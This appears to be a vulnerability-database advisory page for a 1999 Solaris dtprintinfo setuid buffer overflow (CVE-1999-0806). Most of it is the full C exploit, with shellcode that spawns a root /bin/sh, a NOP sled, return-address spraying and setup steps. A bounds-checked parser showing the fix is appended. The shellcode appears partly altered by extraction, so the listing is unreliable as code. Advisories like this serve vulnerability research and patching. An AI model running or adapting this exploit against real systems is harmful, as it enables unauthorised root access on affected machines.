Solaris dtprintinfo Buffer Overflow Vulnerability


Vulnerability ID: 1105447    Type: Buffer overflow
Published: 1999-05-10    Updated: 2005-05-02
CVE: CVE-1999-0806
CNNVD-ID: CNNVD-199905-022
Platform: Solaris    CVSS score: 7.2
|Sources
https://www.exploit-db.com/exploits/19205
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199905-022
|Details
A stack-based buffer overflow exists in the Solaris dtprintinfo program (the CDE Print Manager); because dtprintinfo is installed setuid root, an overlong "-p" argument can lead to code execution as root.
|Exploit
/*
source: http://www.securityfocus.com/bid/249/info

dtprintinfo is a setuid command that opens the CDE Print Manager window. A stack-based buffer overflow in the handling of the "-p" option allows the execution of arbitrary code as root.

This vulnerability has been assigned Sun Bug# 4139394. The vulnerability is in the CDE 1.2 and CDE 1.3 subsystems of Solaris 2.6 and Solaris 7 respectively.

Before executing the ex_dtprintinfo exploit, set your DISPLAY environment variable correctly, and make a dummy lpstat command like:

% cat > lpstat
echo "system for lpprn: server.com"
^D
% chmod 755 lpstat
% setenv PATH .:$PATH
% gcc ex_dtprintinfo.c
% a.out 
*/

/*========================================================================
   ex_dtprintinfo.c Overflow Exploits( for Intel x86 Edition)
   The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
   Written by UNYUN ([email protected])
  ========================================================================
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

static char             x[1000];        /* payload handed to dtprintinfo as the "-p" value */
#define ADJUST          0
#define STARTADR        621             /* offset of the shellcode inside x[] */
#define BUFSIZE         900             /* total payload length */
#define NOP             0x90
unsigned long ret_adr;
int     i;
/* Solaris/x86 shellcode; the "\x" escapes were stripped by extraction and are restored here */
char exploit_code[] =
"\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
"\x8d\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
"\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
"\x17\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
"\x55\x8b\xec\x83\xec\x08\xeb\x50\x33\xc0\xb0\x3b\xeb\x16\xc3\x33"
"\xc0\x40\xeb\x10\xc3\x5e\x33\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88"
"\x7e\x06\xeb\x05\xe8\xec\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f"
"\xc3\x5e\x33\xc0\x89\x76\x08\x88\x46\x07\x89\x46\x0c\x50\x8d\x46"
"\x08\x50\x8b\x46\x08\x50\xe8\xbd\xff\xff\xff\x83\xc4\x0c\x6a\x01"
"\xe8\xba\xff\xff\xff\x83\xc4\x04\xe8\xd4\xff\xff\xff/bin/sh";

/* Returns the current stack pointer (32-bit x86 only, as in the original listing) */
unsigned long get_sp(void)
{
  unsigned long sp;
  __asm__(" movl %%esp,%0 " : "=r"(sp));
  return sp;
}

int main(void)
{
        putenv("LANG=");
        /* NOP sled over the whole payload, shellcode placed at STARTADR */
        for (i=0;i<BUFSIZE;i++) x[i]=NOP;
        for (i=0;i<strlen(exploit_code);i++)
                x[STARTADR+i]=exploit_code[i];
        /* guessed return address, repeated over the first 400 bytes of the payload */
        ret_adr=get_sp() - 1292 + 148;
        for (i = ADJUST; i < 400 ; i+=4){
                x[i+0]=ret_adr & 0xff;
                x[i+1]=(ret_adr >> 8 ) &0xff;
                x[i+2]=(ret_adr >> 16 ) &0xff;
                x[i+3]=(ret_adr >> 24 ) &0xff;
        }
        x[BUFSIZE]=0;
        execl("/usr/dt/bin/dtprintinfo", "dtprintinfo",
        "-p",x,(char *) 0);
        perror("execl");        /* only reached if the exec itself fails */
        return 1;
}
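The defect behind this advisory is the classic one: an option argument copied into a fixed-size stack buffer with no length check. The following is an added example, not the page's exploit and not dtprintinfo's source: a hypothetical model of that vulnerable shape beside a bounds-checked parser for the same "-p" option. The 64-byte buffer size, the status codes, the function names and the helper that feeds the parser an n-byte value are all assumptions made for the demo.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Size of the stack buffer that receives the printer name (constructed limit for this demo). */
#define PRINTER_NAME_MAX 64

enum parse_status { PARSE_OK = 0, PARSE_MISSING_ARG = 1, PARSE_EMPTY = 2, PARSE_TOO_LONG = 3 };

/* Vulnerable shape (hypothetical reconstruction, not dtprintinfo's source): the
 * "-p" value is strcpy()'d into a fixed stack buffer, so any value that does
 * not fit, NUL included, overruns the frame. Only the length decision is
 * modelled here; the unsafe copy itself is never executed. */
int vulnerable_shape_overflows(const char *value)
{
    char name[PRINTER_NAME_MAX];   /* the buffer strcpy(name, value) would overrun */
    (void)name;
    return strlen(value) + 1 > sizeof name;
}

/* Hardened parser: accepts "-p NAME" and "-pNAME", bounds-checks NAME before
 * copying and never writes beyond out[outsz - 1]. */
enum parse_status parse_printer_option(int argc, char **argv, char *out, size_t outsz)
{
    for (int i = 1; i < argc; i++) {
        const char *a = argv[i];
        const char *value;
        size_t len;

        if (strncmp(a, "-p", 2) != 0)
            continue;
        if (a[2] != '\0')
            value = a + 2;              /* -pNAME */
        else if (i + 1 < argc)
            value = argv[++i];          /* -p NAME */
        else
            return PARSE_MISSING_ARG;

        len = strlen(value);
        if (len == 0)
            return PARSE_EMPTY;
        if (len + 1 > outsz)            /* keep room for the terminating NUL */
            return PARSE_TOO_LONG;
        memcpy(out, value, len + 1);
        return PARSE_OK;
    }
    return PARSE_MISSING_ARG;
}

/* Demo helper: feed the parser an n-byte value of 'A's (constructed input) and
 * return its verdict; n = 900 mirrors the payload length (BUFSIZE) built by
 * the exploit listed above. */
enum parse_status verdict_for_value_length(size_t n)
{
    char out[PRINTER_NAME_MAX];
    char *value = malloc(n + 1);
    char *argv[3];
    enum parse_status st;

    if (value == NULL)
        return PARSE_TOO_LONG;
    memset(value, 'A', n);
    value[n] = '\0';
    argv[0] = "dtprintinfo";
    argv[1] = "-p";
    argv[2] = value;
    st = parse_printer_option(3, argv, out, sizeof out);
    free(value);
    return st;
}

int main(int argc, char **argv)
{
    char name[PRINTER_NAME_MAX];
    enum parse_status st = parse_printer_option(argc, argv, name, sizeof name);

    if (st == PARSE_OK)
        printf("printer: %s\n", name);
    else
        fprintf(stderr, "rejected -p option (status %d)\n", (int)st);
    return st == PARSE_OK ? 0 : 1;
}
```

Run as `./a.out -p lpprn` to see the accepted path; `./a.out -p "$(printf 'A%.0s' $(seq 900))"` is rejected with PARSE_TOO_LONG before any copy happens. The point of the hardened parser is that the length check precedes the copy and is expressed against the real destination size (`outsz`), so changing the buffer size later cannot silently reintroduce the overflow.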
|References

Source: OSVDB
Name: 6552
Link: http://www.osvdb.org/6552
